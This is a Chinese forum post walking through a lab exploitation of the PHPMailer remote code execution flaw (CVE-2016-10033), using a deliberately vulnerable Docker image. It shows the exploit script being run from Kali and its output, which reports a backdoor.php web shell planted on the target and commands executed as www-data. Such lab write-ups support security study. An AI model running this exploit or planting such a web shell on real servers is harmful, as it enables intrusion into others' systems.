设为首页 收藏本站
查看: 793|回复: 0

[经验分享] PHPMailer < 5.2.18 远程代码执行漏洞(CVE-2016-10033)

[复制链接]

尚未签到

发表于 2017-11-21 10:29:58 | 显示全部楼层 |阅读模式
PHPMailer < 5.2.18 Remote Code Execution 
  本文将简单展示一下PHPMailer远程代码执行漏洞(CVE-2016-10033)的利用过程,使用的是别人已经搭建好的docker环境,见参考链接。
  实验环境是在Ubuntu 16.04.3上,使用docker镜像。

安装和使用docker镜像
  首先需要在ubuntu上安装docker,可使用如下命令进行安装:



root@starnight:~# apt-getinstall docker.io    【安装docker】
root@starnight:~# docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.17.0.2. Set the 'ServerName' directive globally to suppress this message
==> /var/log/apache2/access.log <==
==> /var/log/apache2/error.log <==
[Thu Nov 09 15:11:47.098917 2017] [mpm_prefork:notice] [pid 8] AH00163: Apache/2.4.10 (Debian) configured -- resuming normal operations
[Thu Nov 09 15:11:47.101902 2017] [core:notice] [pid 8] AH00094: Command line: '/usr/sbin/apache2 -f /etc/apache2/apache2.conf'
==> /var/log/apache2/other_vhosts_access.log <==
  安装完docker之后,需要把相应的靶机环境下载(pull)下来,首次运行上面那条命令会下载docker镜像,之后就会像上面运行的那样,表明docker镜像正在运行。
  查看一下ip地址:



root@starnight:~# ifconfig | grep inet
inet addr:172.17.0.1  Bcast:0.0.0.0  Mask:255.255.0.0
inet6 addr: fe80::42:4aff:fe88:49e5/64 Scope:Link
inet addr:192.168.0.8  Bcast:192.168.0.255  Mask:255.255.255.0
inet6 addr: fe80::a7c0:e1f7:2118:7e6a/64 Scope:Link
inet addr:127.0.0.1  Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
inet6 addr: fe80::98a9:5bff:fe1f:b1c9/64 Scope:Link
  这里192.168.0.8是我们Ubuntu的ip地址,172.17.0.1是docker镜像的内部地址,通过访问http://192.168.0.8:8080/, 就能看到搭建好的存在漏洞的环境:
DSC0000.png


漏洞测试
  接下来我们使用kali来进行测试, 下载exploit-CVE-2016-10033中的exploit.sh到本地,运行如下命令进行测试:



root@kali:~/penetest/CVE-2016-10033# ./exploit.sh 192.168.0.8:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting 192.168.0.8:8080
[+] Target exploited, acessing shell at http://192.168.0.8:8080/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Running whoami
www-data
RemoteShell> ls
[+] Running ls
vulnerable

RemoteShell> pwd
[+] Running pwd
/www
  其实,并不是所有的命令运行都有回显,比如说查看ip地址的命令ifconfig就看不到输出。
  此外,我们在服务器端的输出中也能看到一些有趣的东西:
DSC0001.png

  更多详情,请参考下面的链接。

References
  opsxcq/exploit-CVE-2016-10033  
  PHPMailer < 5.2.18 - Remote Code Execution (Bash)
  PHPMailer < 5.2.18 - Remote Code Execution (PHP)
  PHPMailer < 5.2.18 - Remote Code Execution (Python)

运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-409119-1-1.html 上篇帖子: docker技术之基本命令 下篇帖子: Linux认知之旅【02 装个软件玩玩】!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表